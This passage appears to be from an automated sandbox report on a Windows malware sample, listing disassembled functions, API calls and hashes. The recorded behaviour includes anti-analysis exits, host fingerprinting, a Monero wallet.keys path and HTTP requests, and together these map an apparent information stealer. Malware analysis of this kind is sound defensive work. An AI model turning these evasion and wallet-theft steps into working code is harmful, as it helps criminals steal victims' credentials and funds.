                  • API ID: lstrcpylstrlen$Sleep
                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                  • API String ID: 507064821-2791005934
                  • Opcode ID: bfcc98ab30c860de7772a0d3d261fe1dfdd5a1d83981cb8db655cb3d83f52493
                  • Instruction ID: 3c453489d4fb02c7ef7c730fe078e13f8b82ab07c535d9f2ba3f558a8be88f80
                  • Opcode Fuzzy Hash: bfcc98ab30c860de7772a0d3d261fe1dfdd5a1d83981cb8db655cb3d83f52493
                  • Instruction Fuzzy Hash: 4BE10E71D10208AACB14FBA0DE96FED737CAFD4310F508528B50667591EF34AA09CBA2
                  Function 009B17A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1069 9b17a0-9b17cd call 9baad0 StrCmpCA 1072 9b17cf-9b17d1 ExitProcess 1069->1072 1073 9b17d7-9b17f1 call 9baad0 1069->1073 1077 9b17f4-9b17f8 1073->1077 1078 9b17fe-9b1811 1077->1078 1079 9b19c2-9b19cd call 9ba800 1077->1079 1080 9b199e-9b19bd 1078->1080 1081 9b1817-9b181a 1078->1081 1080->1077 1083 9b187f-9b1890 StrCmpCA 1081->1083 1084 9b185d-9b186e StrCmpCA 1081->1084 1085 9b1913-9b1924 StrCmpCA 1081->1085 1086 9b1932-9b1943 StrCmpCA 1081->1086 1087 9b18f1-9b1902 StrCmpCA 1081->1087 1088 9b1951-9b1962 StrCmpCA 1081->1088 1089 9b1970-9b1981 StrCmpCA 1081->1089 1090 9b1835-9b1844 call 9ba820 1081->1090 1091 9b1849-9b1858 call 9ba820 1081->1091 1092 9b18cf-9b18e0 StrCmpCA 1081->1092 1093 9b198f-9b1999 call 9ba820 1081->1093 1094 9b18ad-9b18be StrCmpCA 1081->1094 1095 9b1821-9b1830 call 9ba820 1081->1095 1097 9b189e-9b18a1 1083->1097 1098 9b1892-9b189c 1083->1098 1118 9b187a 1084->1118 1119 9b1870-9b1873 1084->1119 1105 9b1930 1085->1105 1106 9b1926-9b1929 1085->1106 1107 9b194f 1086->1107 1108 9b1945-9b1948 1086->1108 1103 9b190e 1087->1103 1104 9b1904-9b1907 1087->1104 1109 9b196e 1088->1109 1110 9b1964-9b1967 1088->1110 1112 9b198d 1089->1112 1113 9b1983-9b1986 1089->1113 1090->1080 1091->1080 1101 9b18ec 1092->1101 1102 9b18e2-9b18e5 1092->1102 1093->1080 1099 9b18ca 1094->1099 1100 9b18c0-9b18c3 1094->1100 1095->1080 1120 9b18a8 1097->1120 1098->1120 1099->1080 1100->1099 1101->1080 1102->1101 1103->1080 1104->1103 1105->1080 1106->1105 1107->1080 1108->1107 1109->1080 1110->1109 1112->1080 1113->1112 1118->1080 1119->1118 1120->1080
                  APIs
                  • StrCmpCA.SHLWAPI(00000000,block), ref: 009B17C5
                  • ExitProcess.KERNEL32 ref: 009B17D1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess
                  • String ID: block
                  • API String ID: 621844428-2199623458
                  • Opcode ID: 7c6809c975e4ac50520e9a4c9700e4865835f6b0a032f541b911202016aa22a9
                  • Instruction ID: 142e1b618b552ed430d4eb17038cacdfa46244bb01c50f9829d4f36e73007446
                  • Opcode Fuzzy Hash: 7c6809c975e4ac50520e9a4c9700e4865835f6b0a032f541b911202016aa22a9
                  • Instruction Fuzzy Hash: 835174B4A04249EFDB04DFA0EAA8BFE77B9BF84754F504458E4066B340D774E941CB62
                  Function 009B7500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1124 9b7500-9b754a GetWindowsDirectoryA 1125 9b754c 1124->1125 1126 9b7553-9b75c7 GetVolumeInformationA call 9b8d00 * 3 1124->1126 1125->1126 1133 9b75d8-9b75df 1126->1133 1134 9b75fc-9b7617 GetProcessHeap RtlAllocateHeap 1133->1134 1135 9b75e1-9b75fa call 9b8d00 1133->1135 1136 9b7619-9b7626 call 9ba740 1134->1136 1137 9b7628-9b7658 wsprintfA call 9ba740 1134->1137 1135->1133 1145 9b767e-9b768e 1136->1145 1137->1145
                  APIs
                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 009B7542
                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009B757F
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009B7603
                  • RtlAllocateHeap.NTDLL(00000000), ref: 009B760A
                  • wsprintfA.USER32 ref: 009B7640
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                  • String ID: :$C$\
                  • API String ID: 1544550907-3809124531
                  • Opcode ID: 80414e140db39335638c43d35350a04cbec8e979dc7061eb4297732715c759f2
                  • Instruction ID: e9f247415ecf69e364b725bfac5aeb705b3b1d2a7aa9c3220e0e8790c4c5eeb0
                  • Opcode Fuzzy Hash: 80414e140db39335638c43d35350a04cbec8e979dc7061eb4297732715c759f2
                  • Instruction Fuzzy Hash: A641B4B1D04248EBDF10DF94DD95BDEBBB8EF88710F100599F5096B280DB786A44CBA6
                  Function 009B69F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 009B9860: GetProcAddress.KERNEL32(74DD0000,015E3060), ref: 009B98A1
                    • Part of subcall function 009B9860: GetProcAddress.KERNEL32(74DD0000,015E2F40), ref: 009B98BA
                    • Part of subcall function 009B9860: GetProcAddress.KERNEL32(74DD0000,015E30D8), ref: 009B98D2
                    • Part of subcall function 009B9860: GetProcAddress.KERNEL32(74DD0000,015E3030), ref: 009B98EA
                    • Part of subcall function 009B9860: GetProcAddress.KERNEL32(74DD0000,015E3108), ref: 009B9903
                    • Part of subcall function 009B9860: GetProcAddress.KERNEL32(74DD0000,015E9CD8), ref: 009B991B
                    • Part of subcall function 009B9860: GetProcAddress.KERNEL32(74DD0000,015D6F30), ref: 009B9933
                    • Part of subcall function 009B9860: GetProcAddress.KERNEL32(74DD0000,015D6F70), ref: 009B994C
                    • Part of subcall function 009B9860: GetProcAddress.KERNEL32(74DD0000,015E2FD0), ref: 009B9964
                    • Part of subcall function 009B9860: GetProcAddress.KERNEL32(74DD0000,015E3048), ref: 009B997C
                    • Part of subcall function 009B9860: GetProcAddress.KERNEL32(74DD0000,015E3000), ref: 009B9995
                    • Part of subcall function 009B9860: GetProcAddress.KERNEL32(74DD0000,015E2FB8), ref: 009B99AD
                    • Part of subcall function 009B9860: GetProcAddress.KERNEL32(74DD0000,015D6DB0), ref: 009B99C5
                    • Part of subcall function 009B9860: GetProcAddress.KERNEL32(74DD0000,015E2FE8), ref: 009B99DE
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                    • Part of subcall function 009A11D0: ExitProcess.KERNEL32 ref: 009A1211
                    • Part of subcall function 009A1160: GetSystemInfo.KERNEL32(?), ref: 009A116A
                    • Part of subcall function 009A1160: ExitProcess.KERNEL32 ref: 009A117E
                    • Part of subcall function 009A1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 009A112B
                    • Part of subcall function 009A1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 009A1132
                    • Part of subcall function 009A1110: ExitProcess.KERNEL32 ref: 009A1143
                    • Part of subcall function 009A1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 009A123E
                    • Part of subcall function 009A1220: __aulldiv.LIBCMT ref: 009A1258
                    • Part of subcall function 009A1220: __aulldiv.LIBCMT ref: 009A1266
                    • Part of subcall function 009A1220: ExitProcess.KERNEL32 ref: 009A1294
                    • Part of subcall function 009B6770: GetUserDefaultLangID.KERNEL32 ref: 009B6774
                    • Part of subcall function 009A1190: ExitProcess.KERNEL32 ref: 009A11C6
                    • Part of subcall function 009B7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009A11B7), ref: 009B7880
                    • Part of subcall function 009B7850: RtlAllocateHeap.NTDLL(00000000), ref: 009B7887
                    • Part of subcall function 009B7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 009B789F
                    • Part of subcall function 009B78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009B7910
                    • Part of subcall function 009B78E0: RtlAllocateHeap.NTDLL(00000000), ref: 009B7917
                    • Part of subcall function 009B78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 009B792F
                    • Part of subcall function 009BA9B0: lstrlen.KERNEL32(?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009BA9C5
                    • Part of subcall function 009BA9B0: lstrcpy.KERNEL32(00000000), ref: 009BAA04
                    • Part of subcall function 009BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009BAA12
                    • Part of subcall function 009BA8A0: lstrcpy.KERNEL32(?,009C0E17), ref: 009BA905
                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,015E9C18,?,009C110C,?,00000000,?,009C1110,?,00000000,009C0AEF), ref: 009B6ACA
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 009B6AE8
                  • CloseHandle.KERNEL32(00000000), ref: 009B6AF9
                  • Sleep.KERNEL32(00001770), ref: 009B6B04
                  • CloseHandle.KERNEL32(?,00000000,?,015E9C18,?,009C110C,?,00000000,?,009C1110,?,00000000,009C0AEF), ref: 009B6B1A
                  • ExitProcess.KERNEL32 ref: 009B6B22
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                  • String ID:
                  • API String ID: 2525456742-0
                  • Opcode ID: 75b0abaa828bb042ee799af7b18ae297bb0cae5c7c4f60c781e2759eb455f79b
                  • Instruction ID: 2e99fdeb3c1b9c3babf8c2fffa81838bc1a55b93c206824c20be7f637d472f75
                  • Opcode Fuzzy Hash: 75b0abaa828bb042ee799af7b18ae297bb0cae5c7c4f60c781e2759eb455f79b
                  • Instruction Fuzzy Hash: B8314C70D04208AADB04FBF0DE96BEE7778AFC4720F504518F212A6192DF746905C7A6
                  Function 009A1220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1204 9a1220-9a1247 call 9b89b0 GlobalMemoryStatusEx 1207 9a1249-9a1271 call 9bda00 * 2 1204->1207 1208 9a1273-9a127a 1204->1208 1209 9a1281-9a1285 1207->1209 1208->1209 1211 9a129a-9a129d 1209->1211 1212 9a1287 1209->1212 1214 9a1289-9a1290 1212->1214 1215 9a1292-9a1294 ExitProcess 1212->1215 1214->1211 1214->1215
                  APIs
                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 009A123E
                  • __aulldiv.LIBCMT ref: 009A1258
                  • __aulldiv.LIBCMT ref: 009A1266
                  • ExitProcess.KERNEL32 ref: 009A1294
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                  • String ID: @
                  • API String ID: 3404098578-2766056989
                  • Opcode ID: 3fffc31c3cf4049110ba8cec0baaa8a0a94b4d5f3703bd05bf7051d9b9ae393a
                  • Instruction ID: 3e5c22c65681b0987b02910951984b90ea4e918265003974958bec01380e07b1
                  • Opcode Fuzzy Hash: 3fffc31c3cf4049110ba8cec0baaa8a0a94b4d5f3703bd05bf7051d9b9ae393a
                  • Instruction Fuzzy Hash: 9C016DB0D40308BBEF10DBE0CC89B9EBB7CAB44701F248058EB05BA2C0DB74A5418BD9
                  Function 009B6AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1218 9b6af3 1219 9b6b0a 1218->1219 1221 9b6aba-9b6ad7 call 9baad0 OpenEventA 1219->1221 1222 9b6b0c-9b6b22 call 9b6920 call 9b5b10 CloseHandle ExitProcess 1219->1222 1228 9b6ad9-9b6af1 call 9baad0 CreateEventA 1221->1228 1229 9b6af5-9b6b04 CloseHandle Sleep 1221->1229 1228->1222 1229->1219
                  APIs
                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,015E9C18,?,009C110C,?,00000000,?,009C1110,?,00000000,009C0AEF), ref: 009B6ACA
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 009B6AE8
                  • CloseHandle.KERNEL32(00000000), ref: 009B6AF9
                  • Sleep.KERNEL32(00001770), ref: 009B6B04
                  • CloseHandle.KERNEL32(?,00000000,?,015E9C18,?,009C110C,?,00000000,?,009C1110,?,00000000,009C0AEF), ref: 009B6B1A
                  • ExitProcess.KERNEL32 ref: 009B6B22
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                  • String ID:
                  • API String ID: 941982115-0
                  • Opcode ID: 308502a5ae055f62a8d5b6da4411478920dbc2f461e6ae477704eb65772bfb58
                  • Instruction ID: fdf6ab676d6fecce95d29d6e1ef6c02bd586e6656cdf98f2b9c9ad00feb3ecb0
                  • Opcode Fuzzy Hash: 308502a5ae055f62a8d5b6da4411478920dbc2f461e6ae477704eb65772bfb58
                  • Instruction Fuzzy Hash: CEF05E70944219AFEB00EBA0DE46BFD7B38EB44B21F104915B502E61C1CFB87940D666
                  Function 009A47B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 009A4839
                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 009A4849
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CrackInternetlstrlen
                  • String ID: <
                  • API String ID: 1274457161-4251816714
                  • Opcode ID: 1e1dd1fee5babfc83a48237098a638770c60024f471cc0cfb32fd61580b715ca
                  • Instruction ID: 44841987e6f711413f14f0b7701e6dd5a23d8a54972167842e6ca662dcb1d743
                  • Opcode Fuzzy Hash: 1e1dd1fee5babfc83a48237098a638770c60024f471cc0cfb32fd61580b715ca
                  • Instruction Fuzzy Hash: A5215EB1D00208ABDF10DFA4E845BDE7B79FB44320F108625F915A7280EB706A05CB91
                  Function 009B51F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 009BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009BA7E6
                    • Part of subcall function 009A6280: InternetOpenA.WININET(009C0DFE,00000001,00000000,00000000,00000000), ref: 009A62E1
                    • Part of subcall function 009A6280: StrCmpCA.SHLWAPI(?,015EF828), ref: 009A6303
                    • Part of subcall function 009A6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 009A6335
                    • Part of subcall function 009A6280: HttpOpenRequestA.WININET(00000000,GET,?,015EEEA8,00000000,00000000,00400100,00000000), ref: 009A6385
                    • Part of subcall function 009A6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009A63BF
                    • Part of subcall function 009A6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009A63D1
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009B5228
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                  • String ID: ERROR$ERROR
                  • API String ID: 3287882509-2579291623
                  • Opcode ID: 72845e8a4bb9aac63583a124a699ef06fe2eedc09dd67ec3dab495e5f967a924
                  • Instruction ID: 4180961f3d9006c4189c5e343a2a0558ed92c013896e5771df74614fccf53948
                  • Opcode Fuzzy Hash: 72845e8a4bb9aac63583a124a699ef06fe2eedc09dd67ec3dab495e5f967a924
                  • Instruction Fuzzy Hash: FC11FE30910148BBDB14FF64DE92BED7778AF90310F404558F91A5A592EF34AB05C696
                  Function 009A1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 009A112B
                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 009A1132
                  • ExitProcess.KERNEL32 ref: 009A1143
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
